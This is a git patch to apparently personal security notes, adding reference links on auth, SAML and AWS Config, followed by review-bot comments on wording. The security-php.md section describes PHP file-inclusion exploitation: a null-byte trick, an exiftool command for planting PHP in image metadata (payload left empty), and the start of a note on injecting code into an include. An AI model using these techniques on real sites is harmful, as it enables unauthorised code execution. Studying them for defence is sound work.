From 1c5bc70c0dee824210ccf55c415d4f385325e37e Mon Sep 17 00:00:00 2001 From: Andres Hermosilla Date: Mon, 26 Jul 2021 13:58:00 -0700 Subject: [PATCH] Updates --- auth.md | 2 +- aws.md | 6 ++++++ saml.md | 5 ++++- security-php.md | 11 +++++++++++ 4 files changed, 22 insertions(+), 2 deletions(-) diff --git a/auth.md b/auth.md index 0ff6cf1..8d700ca 100644 --- a/auth.md +++ b/auth.md @@ -57,4 +57,4 @@ OpenID Connect does both. - https://www.theidentitycookbook.com/2016/10/protect-bearer-tokens-using-proof-of.html - https://connect2id.com/learn/token-binding - https://infosec.mozilla.org/guidelines/iam/openid_connect.html - +- https://www.pingidentity.com/en/company/blog/posts/2019/jwt-security-nobody-talks-about.html diff --git a/aws.md b/aws.md index 6ae9f48..104506c 100644 --- a/aws.md +++ b/aws.md @@ -137,6 +137,12 @@ Storing encryption keys in the cloud ## AWS Config - Run a set of checks against resources to ensure adherance to certain standards - $2 a rule +- https://youtu.be/kErRv4YB_T4 +- https://www.youtube.com/watch?v=fBewaclMo2s +- https://jupiterone.com/blog/we-turned-off-aws-config/ +- `AWS_REGION=us-west-1 aws configservice describe-config-rules` +- List of AWS managed rules + - https://docs.aws.amazon.com/config/latest/developerguide/managed-rules-by-aws-config.html ## CloudTrail Think of it as the auditd of linux but for AWS diff --git a/saml.md b/saml.md index 39abddf..9d3e1d0 100644 --- a/saml.md +++ b/saml.md @@ -1,4 +1,7 @@ - https://www.youtube.com/watch?v=SvppXbpv-5k - https://owasp.org/www-project-cheat-sheets/cheatsheets/SAML_Security_Cheat_Sheet.html - https://github.com/jch/saml -- https://www.samltool.com/index.php \ No newline at end of file +- https://www.samltool.com/index.php +- https://duo.com/blog/the-beer-drinkers-guide-to-saml +- https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/ +- https://gravitational.com/blog/how-saml-authentication-works/ 
diff --git a/security-php.md b/security-php.md index e26bd57..707f1e7 100644 --- a/security-php.md +++ b/security-php.md @@ -10,6 +10,17 @@ - Don't forget about the null byte! `%00` - https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ - https://upshell.wordpress.com/2011/06/11/new-vulnerabilities-to-access-files-in-php/ +- https://websec.io/2012/09/05/A-Silent-Threat-PHP-in-EXIF.html + +### Inclusion with Images +Sometimes you may have an `include` but you can add arbitrary PHP files. There may however be a place to add images and you can embed php in an image which gets executed if the image is included. + +``` +exiftool -documentname='' profile.jpg +``` + + + Sometimes PHP is so terribly configured you can inject your code into the inclusion. Here is an example of how you can pass a `sleep(10);` into a possible `include` which
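Review bot: In the aws.md hunk, the two YouTube links added under `## AWS Config` have no title or description, so a reader cannot tell what each covers without opening it. A short label per link, in the way the hunk already does for "List of AWS managed rules", would fix that. The `AWS_REGION=us-west-1 aws configservice describe-config-rules` line would also benefit from a few words saying what it is for and that the region is only an example value.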
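Review bot: In the security-php.md hunk, the first sentence under `### Inclusion with Images` says "but you can add arbitrary PHP files", which contradicts the following sentence ("There may however be a place to add images"); it reads as if "can't" was intended. The fenced command passes an empty value in `-documentname=''`, so as written it does not match what the paragraph describes. Either explain in the text what the tag is expected to hold or drop the block. Smaller points: "php" is lowercase in "embed php in an image" while the rest of the section writes "PHP", and the hunk adds three blank lines after the closing fence where one is enough. Since the section documents a file-inclusion risk, a closing line on the defensive side (an `include` path should never resolve to a user-upload location) would round it out.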